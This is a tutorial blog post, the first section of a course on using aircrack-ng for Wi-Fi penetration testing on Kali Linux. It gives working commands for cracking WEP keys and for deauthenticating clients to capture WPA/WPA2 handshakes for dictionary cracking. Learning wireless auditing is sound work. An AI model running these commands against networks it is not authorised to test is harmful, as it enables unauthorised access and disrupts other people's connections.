Pablo Guides

# Aircrack-ng: Comprehensive Pentest Course – Section 1: Introduction & Installation

## Introduction to aircrack-ng

Aircrack-ng is a powerful suite of tools designed for wireless network security auditing. It is primarily used for assessing the security of Wi-Fi networks by capturing and analyzing packets, as well as testing the robustness of WEP and WPA/WPA2 encryption keys. As a white-hat hacker or penetration tester, understanding how to use aircrack-ng effectively is essential to securing wireless networks.

In this section, we will cover the installation and configuration of aircrack-ng on Kali Linux, provide a step-by-step guide on its usage, and explore real-world use cases with detailed technical explanations.

### Why Use aircrack-ng?

Aircrack-ng offers a comprehensive suite of tools that allow you to:
– Monitor Wi-Fi networks.
– Capture packets.
– Perform aggressive Wi-Fi cracking.
– Conduct statistical attacks on WEP and WPA/WPA2 keys.
– Test the overall security of wireless networks.

—

## Installation and Configuration on Kali Linux

Kali Linux is a popular distribution among penetration testers, known for its extensive collection of security tools, including aircrack-ng.

### Step 1: Update Your System

Before installing new software, it's always a good practice to update your system. Open a terminal in Kali and run:

"`bash
sudo apt update && sudo apt upgrade
"`

### Step 2: Installing aircrack-ng

Aircrack-ng is pre-installed in Kali Linux, but if you need to install or update it, you can do so by running:

"`bash
sudo apt install aircrack-ng
"`

### Step 3: Verify Installation

Once the installation is complete, you can verify that aircrack-ng is correctly installed by checking its version:

"`bash
aircrack-ng –version
"`

You should see output similar to:

"`
Aircrack-ng 1.6
"`

### Step 4: Configuration

Aircrack-ng doesn’t require extensive configuration to start using. However, you might want to configure your wireless adapter to support monitor mode.

#### Setting Up Monitor Mode

To set your wireless interface (for example, `wlan0`) into monitor mode, follow these commands:

"`bash
sudo airmon-ng start wlan0
"`

This will create a new interface, typically named `wlan0mon`. To check if the interface is in monitor mode, use:

"`bash
iwconfig
"`

You should see your interface listed with "Mode: Monitor".

—

## Step-by-Step Usage and Real-World Use Cases

In this section, we will go through some step-by-step processes for using aircrack-ng, focusing on real-world scenarios.

### Use Case 1: Cracking WEP Encryption

#### Step 1: Monitor the Network

First, we need to capture packets from a WEP network. Use airodump-ng to find WEP networks:

"`bash
sudo airodump-ng wlan0mon
"`

Look for a network with WEP in the "ENC" column. Note the BSSID and channel number (CH).

#### Step 2: Capture Packets

Next, focus your capture on the identified WEP network:

"`bash
sudo airodump-ng –bssid [BSSID] -c [CHANNEL] -w wep_capture wlan0mon
"`

This command captures packets from the specific BSSID on the specified channel.

#### Step 3: Generate IVs for Cracking

Let’s crack WEP by collecting enough Initialization Vectors (IVs). Perform an ARP injection to speed up the process:

"`bash
sudo aireplay-ng -1 0 -e [SSID] -o 1 -a [BSSID] wlan0mon
"`

You need to replace `[SSID]` with the network name and `[BSSID]` with the MAC address.

After enough IVs have been collected (typically around 10,000), you can proceed to the next step.

#### Step 4: Cracking the Key

Once you have sufficient IVs, use aircrack-ng to crack the WEP key:

"`bash
sudo aircrack-ng wep_capture*.cap
"`

The output will display the cracked WEP key if successful.

### Use Case 2: Cracking WPA/WPA2 Encryption

#### Step 1: Capture Handshake

To crack WPA/WPA2, you need to capture a handshake. Start airodump-ng targeting the WPA network:

"`bash
sudo airodump-ng –bssid [BSSID] -c [CHANNEL] -w wpa_capture wlan0mon
"`

To capture the handshake, you can deauthenticate a connected client:

"`bash
sudo aireplay-ng -0 2 -a [BSSID] wlan0mon
"`

This command will disconnect a client, prompting it to reconnect, which will capture the handshake.

#### Step 2: Cracking the Password

With the handshake captured, you can now attempt to crack the WPA/WPA2 password using a wordlist. For example, using rockyou.txt:

"`bash
sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt wpa_capture*.cap
"`

Aircrack-ng will attempt to match the captured handshake against the wordlist and will reveal the password if found.

—

## Detailed Technical Explanations

### How WEP Works

WEP (Wired Equivalent Privacy) was designed to provide a wireless LAN with a level of security equivalent to that of a wired LAN. However, it employs weak encryption methods, primarily using the RC4 cipher, making it vulnerable to cracking.

In WEP, the secret key is combined with an Initialization Vector (IV) to create a keystream used to encrypt data. Since the IV is relatively small (24-bits), attackers can collect enough IVs over time to recover the key.

### How WPA/WPA2 Works

WPA (Wi-Fi Protected Access) and WPA2 are improvements over WEP, using the Temporal Key Integrity Protocol (TKIP) and Advanced Encryption Standard (AES), respectively. WPA2 is more secure and is widely used today.

WPA/WPA2 relies on the use of a Pre-Shared Key (PSK) or a RADIUS server for enterprise implementations. The handshake process between the client and the access point establishes a secure connection based on the shared key.

—

## Additional Resources

To learn more about aircrack-ng and wireless network security, consider visiting the following links:

– [Aircrack-ng Official Documentation](https://www.aircrack-ng.org)
– [Kali Linux Official Documentation](https://www.kali.org/docs/)
– [OWASP Wireless Security Testing Guide](https://owasp.org/www-project-web-security-testing-guide/latest/)

—

This concludes the first section of the comprehensive pentesting course focused on aircrack-ng. Make sure to practice the steps outlined here in a safe and legal environment. Understanding how these tools work will greatly enhance your capabilities as a penetration tester.

—

Made by pablo rotem / פבלו רותם